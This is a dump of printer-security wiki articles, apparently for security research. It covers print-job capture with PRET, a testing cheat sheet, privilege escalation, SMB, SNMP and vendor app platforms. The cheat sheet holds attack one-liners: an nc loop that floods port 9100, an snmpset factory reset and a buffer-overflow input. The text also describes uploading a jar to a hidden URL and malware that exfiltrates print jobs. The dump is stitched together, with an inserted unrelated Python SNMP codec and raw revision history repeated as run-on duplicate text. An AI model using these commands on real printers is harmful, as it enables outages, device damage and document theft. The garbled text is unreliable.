   capture fetch  - Save captured print jobs.
   capture print  - Reprint saved print jobs.
 printer:/> capture start
 Future print jobs will be captured in memory!
 printer:/> exit

Now print arbitrary documents (make sure PRET is disconnected so that it does not block the printing channel). Afterwards, you can list, fetch or reprint the captured documents:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> capture list
 Free virtual memory: 16.6M | Limit to capture: 5.0M
 date          size   user   jobname   creator
 ───────────────────────────────────────────────
 Jan 25 18:38  3.1M   -      -         -
 Jan 25 18:40  170K   -      -         -
 printer:/> capture fetch
 Receiving capture/printer/690782792
 3239748 bytes received.
 Receiving capture/printer/690646210
 174037 bytes received.
 printer:/> capture print
 printing...
 printing...
 2 jobs reprinted
 printer:/> capture stop
 Stopping job capture, deleting recorded jobs

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].
= Printer Security Testing Cheat Sheet =
''Last revised 2017-07-02.''

To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specific web-based information leaks using [[Praeda]]. Then use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]].

{| class="wikitable"
|-
! Category !! Attack !! Protocol !! Testing
|-
| rowspan="5" | [[Denial of service]]
| [[Transmission channel]] || TCP || <code>while true; do nc printer 9100; done</code>
|-
| rowspan="2" | [[Document processing]]
| [[PostScript|PS]] || [[PRET]] commands: <code>disable</code>, <code>hang</code>
|-
| [[PJL]] || [[PRET]] commands: <code>disable</code>, <code>offline</code>
|-
| rowspan="2" | [[Physical damage]]
| [[PostScript|PS]] || [[PRET]] command: <code>destroy</code>
|-
| [[PJL]] || [[PRET]] command: <code>destroy</code>
|-
| rowspan="8" | [[Privilege escalation]]
| rowspan="3" | [[Factory defaults]]
| [[SNMP]] || <code>snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6</code>
|-
| [[PML]] || [[PRET]] command: <code>reset</code>
|-
| [[PostScript|PS]] || [[PRET]] command: <code>reset</code>
|-
| rowspan="4" | [[Accounting bypass]]
| TCP || Connect to the printer directly, bypassing the print server
|-
| [[IPP]] || Check if you can set a username without authentication
|-
| [[PostScript|PS]] || Check if PostScript code is preprocessed on the print server
|-
| [[PJL]] || [[PRET]] command: <code>pagecount</code>
|-
| [[Fax and Scanner]] || multiple || Install the printer driver and (ab)use fax/scan functionality
|-
| rowspan="2" | [[Print job access]]
| [[Print job retention]] || [[PostScript|PS]] || [[PRET]] command: <code>capture</code>
|-
| [[Print job manipulation]] || [[PostScript|PS]] || [[PRET]] commands: <code>cross</code>, <code>overlay</code>, <code>replace</code>
|-
| rowspan="5" | [[Information disclosure]]
| [[Memory access]] || [[PJL]] || [[PRET]] command: <code>nvram dump</code>
|-
| rowspan="2" | [[File system access]]
| [[PostScript|PS]] || [[PRET]] commands: <code>fuzz</code>, <code>ls</code>, <code>get</code>, <code>put</code>, …
|-
| [[PJL]] || [[PRET]] commands: <code>fuzz</code>, <code>ls</code>, <code>get</code>, <code>put</code>, …
|-
| rowspan="2" | [[Credential disclosure]]
| [[PostScript|PS]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code>
|-
| [[PJL]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code>
|-
| rowspan="4" | [[Code execution]]
| rowspan="2" | [[Buffer overflows]]
| [[PJL]] || [[PRET]] command: <code>flood</code>
|-
| [[LPD]] || <code>./lpdtest.py printer in "`python -c 'print "x"*3000'`"</code>
|-
| [[Firmware updates]] || [[PJL]] || Flip a bit, check if the modified firmware is still accepted
|-
| [[Software packages]] || multiple || Obtain an SDK and write your own proof-of-concept application
|}
= Privilege escalation =
''Last revised 2017-01-15.''

This category of attacks lists methods which can be used to bypass protection mechanisms or to extend the capabilities of an attacker.

''Currently, the following privilege escalation techniques are discussed in this wiki:''
* [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user
* [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!)
* [[Fax and Scanner]] – Extending the attacker's capabilities (access to phone lines through MFPs!)
Raw
Revision 80 (2017-01-09T09:36:53Z, Admin)

#REDIRECT [[Port 9100 printing]]

References
Revision 25 (2016-12-22T16:56:04Z, Admin)

'''PJL Reference'''
* [http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]

'''PML Reference'''
* [http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP – User’s Guide]

'''PCL Reference'''
* [http://www.hp.com/ctg/Manual/bpl13210.pdf PCL 5 Printer Language Technical Reference Manual]
* [http://www.pclviewer.com/resources/reference/ PCL 5 Printer Command Language Reference]
* [http://www.undocprint.org/_media/formats/page_description_languages/pcl5_quick_reference.pdf PCL 5 Technical Quick Reference Guide]
* [https://support.necam.com/printers/pclcodes/pcl5hp.htm PCL 5 Control Codes and Escape Sequences]

'''PostScript Links'''
* [https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference, third edition (“Red Book”)]
* [https://www-cdf.fnal.gov/offline/PostScript/BLUEBOOK.PDF PostScript Language Tutorial and Cookbook (“Blue Book”)]
* [https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (“Green Book”)]
* [http://w3-o.cs.hm.edu/~ruckert/compiler/ThinkingInPostScript.pdf Thinking in PostScript (Free Addison-Wesley Book)]
* [https://atrey.karlin.mff.cuni.cz/~milanek/PostScript/Reference/REF.html PostScript Level 2 Language Reference]
* [https://en.wikibooks.org/wiki/PostScript_FAQ PostScript FAQ from Wikibooks]
* [http://www.acumentraining.com/acumenjournal.html Acumen Journal and Resources]
* [http://www.tinaja.com/post01.shtml Don Lancaster's PostScript Library]
* [http://www.anastigmatix.net/postscript/ Anastigmatix PostScript Resources]

'''Miscellaneous'''
* [http://www.undocprint.org/ Undocumented Printing – Resource on Printing Protocols]

SMB
Revision 312 (2017-01-31T08:29:45Z, 84.153.135.37)

[[File:SMB-deployment-channel.png|thumb|180px|Printing over SMB]]
Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows-based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files.

In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows:

 C:\> copy /b file \\server\share

...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device, and <code>share</code> is the name of the printer share.
In the UNIX world, directly sending a file to an SMB printer share can be achieved with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite:

 smbclient [-N|-U user] //server/share -c "print file"
 smbspool smb://[user:pass]@server/share 0 user title 1 "" file

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]
----

SNMP
Revision 629 (2017-06-25T11:25:36Z, Admin)

The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so-called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest).

An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the ‘Host Resources MIB’ as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1
iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250"
</syntaxhighlight>

While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer models, often including security-sensitive functionality. A generic approach to create a vendor-independent ‘Printer MIB’ was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [https://en.wikipedia.org/wiki/CUPS CUPS] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities.

As a stand-alone protocol, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included in arbitrary print jobs as so-called [[PML]] commands.

→ ''Related articles:'' [[PML]]
----
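What the <code>snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1</code> call above actually puts on the wire, and what a passive sensor on 161/udp can read back out of such a datagram, as an added example that is not the wiki's or net-snmp's code: a minimal SNMPv1 BER codec in Python. The GetResponse carrying "hp LaserJet 4250" is constructed here to mirror the article's output, and all function names are this example's own.

```python
# Added example, not code from the wiki or from net-snmp: a minimal SNMPv1
# (RFC 1157) BER codec. The "hp LaserJet 4250" reply is constructed, not captured.
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3
PDU_NAMES = {GET_REQUEST: "GetRequest", GET_RESPONSE: "GetResponse", SET_REQUEST: "SetRequest"}
HR_DEVICE_DESCR = "1.3.6.1.2.1.25.3.2.1.3.1"  # hrDeviceDescr.1, as in the article


def _tlv(tag: int, body: bytes) -> bytes:
    """BER type-length-value; long-form length for bodies over 127 bytes."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    ln = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + body

def _int(v: int) -> bytes:
    """BER INTEGER: minimal-length two's complement."""
    return _tlv(INTEGER, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def _oid(dotted: str) -> bytes:
    """BER OBJECT IDENTIFIER: first two arcs share one byte, the rest are base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return _tlv(OID, bytes(out))

def build_message(pdu_tag: int, community: str, bindings, request_id: int = 1) -> bytes:
    """SNMPv1 message: version 0, community string in cleartext, one PDU.
    bindings is a list of (dotted OID, BER-encoded value) pairs."""
    vbl = b"".join(_tlv(SEQUENCE, _oid(o) + v) for o, v in bindings)
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(SEQUENCE, vbl))
    return _tlv(SEQUENCE, _int(0) + _tlv(OCTET_STRING, community.encode()) + pdu)

def snmpget_v1(community: str, oid: str, request_id: int = 1) -> bytes:
    """The datagram `snmpget -v1 -c <community> printer <oid>` sends (value is NULL)."""
    return build_message(GET_REQUEST, community, [(oid, _tlv(NULL, b""))], request_id)

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, body, position just after this TLV)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(body: bytes) -> str:
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:  # last byte of this arc
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def _decode_value(tag: int, body: bytes):
    if tag == INTEGER:
        return int.from_bytes(body, "big", signed=True)
    if tag == OCTET_STRING:
        return body.decode("latin-1")
    if tag == OID:
        return _decode_oid(body)
    return None if tag == NULL else body.hex()  # Counter/Gauge/TimeTicks left raw

def parse_message(datagram: bytes) -> dict:
    """Decode version, community, PDU type and varbinds: the fields a sensor logs."""
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, req_id, p = _read_tlv(pdu, 0)
    _, _status, p = _read_tlv(pdu, p)  # error-status
    _, _index, p = _read_tlv(pdu, p)   # error-index
    _, varbinds, _ = _read_tlv(pdu, p)
    bindings, vpos = [], 0
    while vpos < len(varbinds):
        _, vb, vpos = _read_tlv(varbinds, vpos)
        _, oid_body, q = _read_tlv(vb, 0)
        vtag, vbody, _ = _read_tlv(vb, q)
        bindings.append((_decode_oid(oid_body), _decode_value(vtag, vbody)))
    return {"version": _decode_value(INTEGER, ver), "community": community.decode("latin-1"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)),
            "request_id": _decode_value(INTEGER, req_id), "bindings": bindings}

def audit(datagram: bytes, weak=("public", "private")) -> list:
    """Findings a passive sensor would raise for one SNMP datagram."""
    m = parse_message(datagram)
    findings = []
    if m["community"] in weak:
        findings.append(f"default community string {m['community']!r} sent in cleartext")
    if m["pdu"] == "SetRequest":
        findings.append("SetRequest to " + ", ".join(o for o, _ in m["bindings"]))
    return findings
```

Feeding <code>snmpget_v1("public", HR_DEVICE_DESCR)</code> to <code>audit</code> reports the default community string, because an SNMPv1 message carries it as a plain OCTET STRING right after the version field.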
As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 21bdd51de63c3a1efb1488a6256b4f590ee13f6d 309 308 2017-01-31T08:21:51Z 84.153.135.37 0 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. 
A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 59e395157445cb12179ecd5df35fc2282427124f 308 177 2017-01-31T08:20:33Z 84.153.135.37 0 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. 
Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 9fabb75d7c0e42c5ea180ee762c859244f3c272c 177 128 2017-01-21T11:45:49Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). 
An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- 04fd1d62bebb9fd2d82611bd9613ba2bea12f32c 128 68 2017-01-14T19:58:22Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. 
Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: $ snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- e1e341a3d5578f59716c040263e5e67c8f9563f8 68 67 2017-01-08T16:04:24Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. 
Software packages 0 43 322 282 2017-01-31T10:12:56Z 84.153.135.135 0 wikitext text/x-wiki

In recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended for and is reserved to resellers and contractors, not end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref>, which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security threat.
Furthermore, code signing of software packages is potentially harder than it is for [[Firmware updates|firmware]], as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. It is therefore logical to include the secret key in SDKs, which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs.

== Vendors ==

In the following, a rough outline of the software platforms provided by major printer vendors to extend the functionality of their devices is given.

=== HP (Chai/OXP) ===

HP introduced their ‘Chai Appliance Platform’ in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first <ref>''[https://www.heise.de/newsticker/meldung/Java-API-fuer-HP-Drucker-54026.html Java API für HP-Drucker]'', heise online, 2001</ref>, access was later restricted to members of HP's developer network. Chai servlets come as <code>.jar</code> files which originally needed to be certified and signed by HP before they would be accepted by a printer device. <ref name="phenoelit2002embedded">''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> discovered a flaw in the deployment process: by installing ''EZloader'' – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 59</ref> were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref>, who extended the device to support load balancing and included the required SDK files and proprietary Java libraries in their demonstration. With these libraries, arbitrary Java code can be compiled and executed on older HP LaserJets by uploading the <code>.jar</code> files to a ‘hidden’ URL: <code>http://printer/hp/device/this.loader</code>. This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from <code>/dev/rdsk_jdi_cfg0</code> with PostScript (see [[file system access]]) or bypassed by resetting the device to [[factory defaults]]. A web attacker can upload the <code>.jar</code> file using [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ ([https://developers.hp.com/oxp/ OXP]) instead of Chai, for which no SDK is publicly available.

=== Canon (MEAP) ===

The ‘Multifunctional Embedded Application Platform’ ([http://www.developersupport.canon.com/faq/335#t335n18 MEAP]) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third-party developers can obtain the MEAP [http://developersupport.canon.com/content/meap-sdk-0 SDK] for a fee of ''$5,000'', which is certainly out of scope for research purposes.

=== Xerox/Dell (EIP) ===

The ‘Extensible Interface Platform’ ([http://www.office.xerox.com/eip/enus.html EIP]) <ref>''[http://www.it-executive.nl/images/downloads/Extensible%20Interface.pdf From Peripheral To Platform: MFP Software Development Tools and Xerox's Extensible Interface Platform]'', B. Bissett, 2016</ref> was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [http://www.office.xerox.com/eip/enus.html SDK] is freely available for registered developers.

=== Brother (BSI) ===

The ‘Brother Solutions Interface’ ([https://www.brother-usa.com/lp/civ/bsi.aspx BSI]) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [https://www.brother-usa.com/lp/civ/home.aspx SDK] is available to licensed developers.

=== Lexmark (eSF) ===

The ‘Embedded Solution Framework’ ([http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf eSF]) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>, ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures.

=== Samsung (XOA) ===

The ‘eXtensible Open Architecture’ ([http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/ XOA]) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [http://xoapartnerportal.com/ SDK] is only available to Samsung resellers.

=== Ricoh (ESA) ===

The ‘Embedded Software Architecture’ ([https://www.ricoh.com/esa/ ESA]) <ref>''[http://ricoh.com/esa/pdf/white_letter.pdf White Paper: Embedded Software Architecture SDK]'', Ricoh Company, Ltd., 2014</ref> was launched by Ricoh in 2004. The Java-based [http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview SDK/J] is available to developers after registration.

=== Kyocera/Utax (HyPAS) ===

The ‘Hybrid Platform for Advanced Solutions’ ([http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp HyPAS]) <ref>''[http://www.officeproductnews.net/sites/default/files/imce/KyoceraWhitepaper_0.pdf Kyocera's HyPAS Technology – A Whitepaper]'', Kyocera Corp., 2013</ref> was released by Kyocera in 2008. Applications are based either on Java or on web services. The [https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html SDK] is only available to members of the ‘HyPAS Development Partner Programme’, and applications have to be approved by Kyocera.

=== Konica Minolta (bEST) ===

The ‘bizhub Extended Solution Technology’ ([https://best.kmbs.us/ bEST]) <ref>''[http://www.biz.konicaminolta.com/technologies/best/pdf/bEST_Whitepaper.pdf Konica Minolta's bizhub Extended Solution Technology (bEST) Software Development Platform for MFPs]'', B. Bissett, 2009</ref>, which is based on web services, was introduced by Konica Minolta in 2009. Access to the [https://best.kmbs.us/pages/levels.php SDK] requires ‘platinum membership level’ in the developer program for a fee of ''$4,000'', which is out of scope for independent researchers.

=== Toshiba (e-BRIDGE) ===

The ‘e-BRIDGE Open Platform’ ([http://www.estudio.com.sg/solutions_ebridge.aspx e-BRIDGE]) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public.

=== Sharp (OSA) ===

The ‘Open Systems Architecture’ ([http://siica.sharpusa.com/Document-Systems/Sharp-OSA OSA]) <ref>''[http://www.kelo-kopiertechnik.de/uploads/prospekte/loesungen/Prospekt OSA.pdf Sharp OSA – Informationen für Sharp Fachhändler]'', Sharp K.K., 2009</ref> was announced by Sharp in 2004. The [http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx SDK] used to develop web services is fee-based, and applications need to be validated by Sharp before they can be installed on an MFP.

=== Oki (sXP) ===

The ‘smart eXtendable Platform’ ([http://www.oki.com/en/press/2014/09/z14053e.html sXP]) <ref>''[http://www.oki.com/en/otr/2016/n227/pdf/otr-227-R05.pdf Office Solution with Multifunction Printer]'', N. Toshiyuki and T. Ito, Oki Electric Industry Co., Ltd., 2016</ref>, which is based on web services, was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or a publicly available SDK.

== Results ==

On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server, which can be easily retrieved with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms for lack of access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below:

{| class="wikitable" style="text-align:center"
|-
! Vendor !! Platform !! Embedded Java !! Web services !! Deployment
|-
| style="text-align:left;" | HP
| style="text-align:left;" | Chai/OXP || ✔ || ✔
| style="text-align:left;" | web server
|-
| style="text-align:left;" | Xerox/Dell
